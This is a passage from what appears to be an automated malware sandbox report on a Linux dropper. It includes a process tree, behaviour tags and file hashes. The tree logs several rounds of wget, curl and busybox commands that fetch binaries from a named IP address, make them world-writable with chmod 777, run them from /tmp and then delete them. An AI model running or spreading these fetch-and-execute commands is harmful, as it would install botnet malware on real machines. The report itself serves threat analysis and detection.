    - Executes dropped EXE
  - /bin/rm (PID:939): rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  - /usr/bin/wget (PID:940): wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  - /usr/bin/curl (PID:941): curl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:942): /bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  - /bin/chmod (PID:943): chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
    - File and Directory Permissions Modification
  - /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC (PID:944): ./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
    - Executes dropped EXE
  - /bin/rm (PID:945): rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  - /usr/bin/wget (PID:946): wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  - /usr/bin/curl (PID:947): curl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:948): /bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  - /bin/chmod (PID:949): chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
    - File and Directory Permissions Modification
  - /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC (PID:950): ./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
    - Executes dropped EXE
  - /bin/rm (PID:951): rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  - /usr/bin/wget (PID:952): wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  - /usr/bin/curl (PID:953): curl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:954): /bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  - /bin/chmod (PID:955): chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
    - File and Directory Permissions Modification
  - /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 (PID:956): ./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
    - Executes dropped EXE
  - /bin/rm (PID:957): rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  - /usr/bin/wget (PID:958): wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  - /usr/bin/curl (PID:959): curl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox (PID:960): /bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97